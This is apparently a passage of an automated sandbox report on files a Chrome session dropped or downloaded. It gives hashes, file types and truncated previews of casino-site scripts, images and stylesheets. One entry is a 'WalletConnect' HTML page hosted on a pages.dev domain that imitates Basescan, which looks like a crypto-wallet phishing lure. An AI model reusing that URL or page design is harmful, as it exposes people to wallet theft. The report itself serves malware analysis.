                                                                                                                                                                                                                                              Preview: :root {.. --animation-duration: 300ms;.. }.... @keyframes fadeIn {.. from {.. opacity: 0;.. }.. to {.. opacity: 1;.. }.. }.... @keyframes fadeOut {.. from {.. opacity: 1;.. }.. to {.. opacity: 0;.. }.. }.... .animated {.. animation-duration: var(--animation-duration);.. animation-fill-mode: both;.. }.... .fadeIn {.. animation-name: fadeIn;.. }.... .fadeOut {.. animation-name: fadeOut;.. }.... #walletconnect-wrapper {.. -webkit-user-select: none;.. align-items: center;.. display: flex;.. height: 100%;.. justify-content: center;.. left: 0;.. pointer-events: none;.. position: fixed;.. top: 0;.. user-select: none;.. width: 100%;.. z-index: '';.. }.... .walletconnect-modal__headerLogo {.. height: 21px;.. }.... .walletconnect-modal__header p {.. color: #ffffff;.. font-size: 20px;.. font-weight: 600;.. margin: 0;.. align-items: flex-start
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1470
                                                                                                                                                                                                                                              Entropy (8bit):6.250117387633445
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:+ZYj6LYqkzum8COZNDsLlpGPUc6QlQHrTQkmvQnuQc8sWfk0/9+e:+ZYjwYqklfll0xlQHrTEYnuQc837F
                                                                                                                                                                                                                                              MD5:795EB0CEBF7B69CAD0C30BF54C3ACE21
                                                                                                                                                                                                                                              SHA1:189A0EF15F7E1D66B6A2946412C7C3218FE56B0F
                                                                                                                                                                                                                                              SHA-256:7FDF33BF6D4D39028F3BD7B3FFA8E646153A8EC717C13A3F873AB31367299ADB
                                                                                                                                                                                                                                              SHA-512:683A398F6526E57AF06B66BEBADD14039BD664CA5D72B5DA7D62555A4791DA86AEBB0E4F5C5ECB697489C564868DE289DBE5BF02632302107F585EFD5BDE4422
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/13106_The%20Zeus%20vs%20Hades.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3.......(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma....................mdat........0@CA.2.......1..+TYXH..y.....sw`<.k#5.......8..+W'....../zMU .Q...P....L.y(........m...[....6.Z.IEA~n..B.k.'..-!..R$....(.....-9.?ECn.k...]V7+0.X.0-..O.V...\.T$.....l..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64165)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):64212
                                                                                                                                                                                                                                              Entropy (8bit):5.2478191019756
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:VPlcKVuaBJSXH4yWYUmFq54mjczZNVu6aLm/AX4ux7XV:zcKVuaBJSXH4tYUl1y/wL
                                                                                                                                                                                                                                              MD5:292192EB489CFC4D9AFED840924CAB54
                                                                                                                                                                                                                                              SHA1:81CA996CCC051023356EF2BC4B340A66C9E0780D
                                                                                                                                                                                                                                              SHA-256:ACD10D537FB4003C5C3AFE583EFEB69D04169CD2167CAD2C931B80AB8B108DCF
                                                                                                                                                                                                                                              SHA-512:918E8313F958C947DD2ED7740EFF1367A0C9675005D0799AE87BEA5C2009CD35091CEDBD3DAB09C9B83162EBB0C029BD79D2527C38DF88D8A2EDAA4322296691
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/modules/bonus2/assets/init-433d720f.js
                                                                                                                                                                                                                                              Preview:import{a7 as r}from"./manifest-51a3674f.js";const t=`.container{width:100%}@media (min-width: 640px){.container{max-width:640px}}@media (min-width: 768px){.container{max-width:768px}}@media (min-width: 1024px){.container{max-width:1024px}}@media (min-width: 1280px){.container{max-width:1280px}}@media (min-width: 1536px){.container{max-width:1536px}}.bonus-card{display:grid;grid:"cover title title" auto "cover content content" 1fr "cover description actions" 2.5rem / auto 1fr 1fr}@media (min-width: 640px){.bonus-card{grid:"cover" auto "title" auto "content" 1fr}}.bonus-card-small{grid:"cover title actions" auto "cover content actions" 1fr "cover description actions" auto /auto 1fr auto}.vip-join-button{--bonus-gradients-vip-join-button: linear-gradient(270deg, #FBD765 0%, #EF9E3F 100%);background-image:var(--bonus-gradients-vip-join-button);box-shadow:0 -2px #d3872c inset}.popup-rules{list-style-type:none}.popup-rules li{position:relative;padding-left:1rem}.popup-rules li:before{content
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 200 x 267, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):26824
                                                                                                                                                                                                                                              Entropy (8bit):7.98188500199438
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:768:FLln1LCRIl0kRX9/anmwVmJflQLlw9tnwAvSV6GIBaMhT:FLl1uRe0k1sx4lTlwt03T
                                                                                                                                                                                                                                              MD5:7C0268B536074FA1EBBB05DD4D52ABFC
                                                                                                                                                                                                                                              SHA1:41D88F6C78CA45E867EB14631A3CA3637BAEC19D
                                                                                                                                                                                                                                              SHA-256:F0B27EA23898A7396D4F888B77BB243B02203CE4923F6B021ECFF99BC5F1DBBA
                                                                                                                                                                                                                                              SHA-512:FBDF4C03705E0BB25CB72F600748CB27EA360E5FFBAD527C8588F4196D2EC8473118711428D7A44422915FC35C8C9EB7FEFD9722C3140A60840F291F17CC85E4
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR...............9.....sRGB.........PLTE......$..).......#............*..!..'..,.. .)0!.2#.6$......%.../.4.. ... ..*.04.88 =Y+.(.....$."%.,0..D(F..*_. <".S).6....sT'.@"@'.7..$*..)....7.....B$.K(.Y+.,..$.......<..:'".......od0"H*I....v....h,....c......L/N'.'...........!.&...........-.(...........S3R .25.........|`!. ..V=R3)..T..vM:..WC....^....t[....g.2.......lFe];Z]4.L%.......^;/D".uMl.jT.r...kI1.Y5V....L.~.....~Ut...f>_....w...g5$..M..ldm..."/.................".~.......hE8.aB.t...^K=.4..n...]|......v{q|,..\T]PFO....k....|..s@U7.0...c5J?K....mA,...E;A4. ....]rW=.<(.D..D,&U`/.Nc..I16........{..U......C..;05.lL.pu>`......{.1.{B...R'?...^M....Vp.F.@...rl:....g.".<.T.M.....P..rO ...Vb|.hn....9.xiz..$4....MC...4.n!.J.`/.z>.NU7Ha.K%...._.'.c.. $.S.5.(.Z8.d.M.... .IDATx^...\T...=..s.s.93.dNZ..v..m.a..0.?.Q.#..../.ed...HW.q).C..h.%.$...FmT..&.......>..y.n.msi.t...._...w.0..y........|...e\.r5...H.RU_..............W.X...o.."..gY>
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (496), with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):496
                                                                                                                                                                                                                                              Entropy (8bit):4.606443278557604
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6:xvkvFrWX0s0s0s0s0s0s0s0s1PAQU3Qm6SfVVVVVVVVmn:xkcAQU3z6Sun
                                                                                                                                                                                                                                              MD5:E6622EE6BC03BBDFA26A7FE3759E912E
                                                                                                                                                                                                                                              SHA1:9162BF7495A44A91B1E7F43B8C5BC48E26930331
                                                                                                                                                                                                                                              SHA-256:8DDCD1AF55D4AE0CB5F9F33BABFDD0C1F59680C2C9DC7ECA704AA80F68F86D6A
                                                                                                                                                                                                                                              SHA-512:5992983943968AEAF03243D222589E691A0EB670C824C82F67B208401E27609D42371C340284EDCFB92DD0E3A5E91DBA36D05172CEA2397E2AA59B87AD820F0A
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISlQEJx-Kf3tI6s0kSBQ0aaYzfEgUNPR9TPBIFDVqx1xASBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNMeUv_hIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIXCWWIXn0AAOPcEgUNGmmM3xIFDT0fUzwSEAlBCdISZwSuWhIFDVqx1xASOglaBNe_WLhjZBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSBQ3BobYcEgUNwaG2HBIFDcGhthwSTwnjpyY1BVI-LRIFDTHlL_4SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8SBQ0G7bv_EgUNBu27_xIFDQbtu_8=?alt=proto
                                                                                                                                                                                                                                              Preview:CrQBCgcNGmmM3xoACgcNPR9TPBoACgcNWrHXEBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNMeUv/hoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoACgcNBu27/xoAChIKBw0aaYzfGgAKBw09H1M8GgAKCQoHDVqx1xAaAAo/CgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACgcNwaG2HBoACloKBw0x5S/+GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgAKBw0G7bv/GgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):16
                                                                                                                                                                                                                                              Entropy (8bit):3.75
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:H9c8GyYn:JY
                                                                                                                                                                                                                                              MD5:1822FA20D48ADF778B863BE4020646D1
                                                                                                                                                                                                                                              SHA1:3A944D69B98D6906730EA860DF7CB5670A47C8D1
                                                                                                                                                                                                                                              SHA-256:CAFDD70835DFE0349177A41B04B2FCF4599EC943CA3EEDF588081D14414525DA
                                                                                                                                                                                                                                              SHA-512:55D857E779FAF942525E02B096458BF676556F9CFD9032C448B6F2FA1B3198323E5B87A786177D0898B608D02B93476B6F4AA5843FFBFABA30C041A6A9441484
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISEAlaBNe_WLhjZBIFDcGhthw=?alt=proto
                                                                                                                                                                                                                                              Preview:CgkKBw3BobYcGgA=
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/website.html
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (1206)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1207
                                                                                                                                                                                                                                              Entropy (8bit):5.384612292322804
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:Y2x5EF1tw6LGQzCPKVUSrcCTbmkoIa0IOeOCUMW9qM31eioyFqz7:YY5MvCAUPCTyjIa0IOeOHpvleJyF+
                                                                                                                                                                                                                                              MD5:A4A5C0E7A9CF5D29D3BA22755409875B
                                                                                                                                                                                                                                              SHA1:22D52E33A0520900E516CA570835D9FE0C7CAE44
                                                                                                                                                                                                                                              SHA-256:BB2EA3D374695C19E5A6A12D9C78058480D239376817927FF3F5E1DBED7308ED
                                                                                                                                                                                                                                              SHA-512:7373A801F01DA48E0F3DAA6FA019F8703A7B5EB54485871E91265B57AB66806BECC24DA7FB7DA5D2D06723B0233053E91077E6A925DD59EDAAFC1873AF744AE8
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:var c=(g,r,s)=>new Promise((i,o)=>{var e=t=>{try{a(s.next(t))}catch(p){o(p)}},n=t=>{try{a(s.throw(t))}catch(p){o(p)}},a=t=>t.done?i(t.value):Promise.resolve(t.value).then(e,n);a((s=s.apply(g,r)).next())});import{c as m}from"./web-170e0195.js";import{r as l,o as u}from"./solid-js-bce2a176.js";import{g as f,h as d,U as T}from"./UnableLogin-924f35fd.js";import{c as h,d as L,f as U,t as y,g as S,p as k}from"./manifest-e71017e8.js";import"./toInteger-d3049371.js";import"./toNumber-2a781ab2.js";import"./isObject-010a5422.js";import"./isObjectLike-e68f0fe0.js";import"./i18n-78ff9edb.js";const F=function(r){const s=o=>c(this,null,function*(){const e=yield S().get(`/account/self-exclusion/status/${o}/`),n=e.startTime+e.period*30*864e5;k.push(()=>m(T,{get startTime(){return e.startTime},endTime:n}))}),i=o=>c(this,null,function*(){try{L.emit("sensorsTrack",{event:"third_register_click",account_type:"google"}),yield d({fullName:o.fullName,idToken:o.idToken,openUserId:o.openUserId,userType:"google"
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1605)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1606
                                                                                                                                                                                                                                              Entropy (8bit):5.042579605159322
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:lvJRXwb+PPkCaNGyZWOMQsodkoYOpi8QskdkLQsOn17M1:dJRX5TU1RsJyWs1ksB
                                                                                                                                                                                                                                              MD5:5BC5E4CC8A6B52A3C514C9803D527632
                                                                                                                                                                                                                                              SHA1:22D673C902DB85ED5EA23BDBCD9E4C11C3C3CA91
                                                                                                                                                                                                                                              SHA-256:C07CFF6818157AE4C332CEA5C30BBF91BECBD07D168F5B98833F11602FFA442E
                                                                                                                                                                                                                                              SHA-512:78408FC03F131D88F3BE080A9D4B39614DAE81ABEC16D8EC157FBA8470BEE9F4F92783A170264854AFE385FF1B87695517A7605CDFA80D2CAC9329D017485D88
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{h as e}from"./http-f4555b94.js";import{B as a}from"./baseService-449c2e3e.js";const i={getRechargeList(){return e.get("/game/support/bonus/vr/list/")},getRechargeTier(){return e.get("/game/support/bonus/vr/tire/")},claimRakeback(){return e.get("/activity/recharge-bonus/claim/")},rakebackBonusHistory(r){return e.post("/activity/recharge-bonus/records/",r)},activateRecharge(){return e.get("/game/support/bonus/vr/pass/")},claimRecharge(r){return e.post("/game/support/bonus/vr/receive/",r)},changeInterval(r){return e.get(`/game/support/bonus/vr/interval/${r}/`)}};class s extends a{constructor(t){super(),this.api=t}rechargeListResource(){return this.createSharedResource(()=>({queryKey:[this.rechargeListResource.name],queryFn:this.api.getRechargeList,initialData:{lastBetUsd:"0",nextBetUsd:"0",receiveUsd:"0",vipLevel:142,startTime:0,endTime:0,intervalTime:6e5,lastReceiveTime:0,nextReceiveTime:0,receiveTimeMS:0,status:0,rewards:[],viphostUserId:0,sendBonus:!1}}))}rechargeTierResource(){
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):1496
                                                                                                                                                                                                                                              Entropy (8bit):7.825740214888702
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:7M/wTZIGjB1+pj4GJtwgK3JvjLnmyWFHqDiw/Ex5U5B0IZVCkkrUc3850yNyDiy3:7M/wmGN1++EwxZbLWFHqGw/ExS52kVRw
                                                                                                                                                                                                                                              MD5:268F04279750D36831FF58729BC781A6
                                                                                                                                                                                                                                              SHA1:18D08D9D32DBB038FED85156B91821556CF1AD7A
                                                                                                                                                                                                                                              SHA-256:967C38794289B7107BAE2AA556A4027AA66080EF1EA71FD8FE3AEBB58489DEC2
                                                                                                                                                                                                                                              SHA-512:F4A320990ECDA6111861FA21A3D2A81BF6E16CEDB5053969975984C20C74F8678C50E302861D40FA6FA853FF1393BA6A60F15CE19DF114C1D448B0E1A83D6C33
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/sigma-DzhjGPHa.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../.....`.m..._...4..m#...f.{..m..?...~..d...HF....@@..@...a..D....|MV..oX.H6?.v.n.I.mM...T..h"..._.....G...O..?T.{)9.\j..&..>...J.9....y[..y...{...v..]....B..p....l.....5.+....9......3....$.5...M<..Q.D...wgrLMB....y........J..@....W3.<.....g..vx(....@.p.{..)dz.x.+q.....*..a.....6.8.!.&.]..g.Fa.q.mW.!.@qK!.............)&..B..[.tS...+.S1q}.<.$...iS:......=%.M.c..K..Y.C^.E]U.6....Q...W."...Rk.u..p"c.r.:...B.<.>....o......:..d.1$..u.........#.H...:..r..t...%dM...@.+o.)N.%.........x5K.l...E.V....o.:...8.0u_^..`.<t.[3.....0...!..K..n..K....X..)z76]....g..d....no!uZU.l..^...!...:..T.l.|..a(.Cd....,....G7..K.M2.?.=.w...X'....a.......6$.1.J(.....h....."..f.n..s..@.0.b...........w...J>B..m..\ {H.F...y.....S...is.../U7.U......H.lx>LXCc.U.S.%..!....<....Ok....&....YGc...y{P......SQ..j....V/'`d..W...5..J*qJ...d..&{.R.6...mx}.P....f...........Q.M..T.......e..T..i..j.. ....N.P>..*.!-O'...........y.....?.Q.......}.....L.G.4>.YC.H......E.
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 153 x 144, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1557
                                                                                                                                                                                                                                              Entropy (8bit):7.819394539345038
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:24:/gHqvFmlKIliHRGFRbAz/2zcEg3+kxCG5Nex2DdMF8HQVNNrsLrrkCAuENczerPZ:IHqvFGKBxHD3Ev/mNY3RVNwPfxIL
                                                                                                                                                                                                                                              MD5:AC6598CF1EAF90D17721CB1535EF21D0
                                                                                                                                                                                                                                              SHA1:0EB343A047A3A54D57A05A26D001C18F5A1A1D9E
                                                                                                                                                                                                                                              SHA-256:71970479C2BB19543E5625E3E867D127ECA155599A76A97E3C6E748640FB20FC
                                                                                                                                                                                                                                              SHA-512:D8E9A0D3EF085C6A86047A75F9EFD07ADC586CF5DE45486690D02C824019E3BB8CE5889CA55EF0A41B6489CE92F6E92EFF76B0DBADB09D8E9E25B462F6FB1565
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:.PNG........IHDR.............,.9@...BPLTE...................................................................tRNS. ....@.`...0p.p.Po.*..'...mIDATx....&.... .....j*U.d. ..b......n...Z...Ng....I..rn:..Rzs"../..<..H.|.N.2.J8=..K..Km&....\\.Z..&qa.N......~..Yl..^Z..#..S...D.+..l.`..F>.M.6-#.X..^:..............Tv.t, :.6...A..a...Z.b).E..c.Z0....X...o.:'......MQU.&...\.l^.......^....$..h..$4k.....p.k......o.....'.....z..[.^..+....~...g=...I.6.M`.x.6..U.rg.e.?q.,l....O.?0.x.!... ..[...S.$...}.?0.H|..J%_g.MFl.t....ewq.C.....r..`.i"....@....&.=M..h.3......Y...F...*.?t..dyb..[......+...{..t..6D..i........Da._2.V...-d.N.........@f.....6.J.R2<f*..J...bc2.f.....*.|.W5....2k..7......B-.FeV9.%I....a2.....@>].Y.h.lAaF.....(.Nf`'.C2...d.$......=...L..xI...d{...}..../d.*.J...o#9O.S.........%...#4.H.s.u.d.h..........N&]......p.K...Ou.Z2..^tK.D.kg... ...N&cl...fs..90a.....r4..Jp.e.....-.d$.;.J2.R....b...ncF'L.s..`a.gA..9....;..a2.. L&...d.".3..L'.NbJv.m.r.tT.......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (57790), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):57997
                                                                                                                                                                                                                                              Entropy (8bit):5.097338571091526
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:nkZTl+wI1OAvkqDb3ay25FrCes0+Tw6j3rwzlr2o:nkZUwI1OAvkqDb3ay25FrCes0+T4
                                                                                                                                                                                                                                              MD5:83156CBC61728BC80174AC1EB26F1A34
                                                                                                                                                                                                                                              SHA1:DA0D19A8E4FBE5DE92D8385074B91D32C223921E
                                                                                                                                                                                                                                              SHA-256:220B12C5DCB405684B22AA4A7AB6FF7EAA5D6C3C91814F0C69D281D5B3755D69
                                                                                                                                                                                                                                              SHA-512:252E84375F65527CF13EE509E9BECD86B37C0EE1A6675DC7D7A49CD723A65887B5E093BFE3845EC96E618E3EFDABF4EC6AFD3213852750080AE3DF5589C3788C
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/vendor/animate.css/animate.min.css?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:@charset "UTF-8";..../*!.. * animate.css -http://daneden.me/animate.. * Version - 3.7.0.. * Licensed under the MIT license - http://opensource.org/licenses/MIT.. *.. * Copyright (c) 2018 Daniel Eden.. */....@-webkit-keyframes bounce{0%,20%,53%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,.61,.355,1);-webkit-transform:translateZ(0);animation-timing-function:cubic-bezier(.215,.61,.355,1);transform:translateZ(0)}40%,43%{-webkit-animation-timing-function:cubic-bezier(.755,.05,.855,.06);-webkit-transform:translate3d(0,-30px,0);animation-timing-function:cubic-bezier(.755,.05,.855,.06);transform:translate3d(0,-30px,0)}70%{-webkit-animation-timing-function:cubic-bezier(.755,.05,.855,.06);-webkit-transform:translate3d(0,-15px,0);animation-timing-function:cubic-bezier(.755,.05,.855,.06);transform:translate3d(0,-15px,0)}90%{-webkit-transform:translate3d(0,-4px,0);transform:translate3d(0,-4px,0)}}@keyframes bounce{0%,20%,53%,80%,to{-webkit-animation-timing-function:cubic-bezier(.215,
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
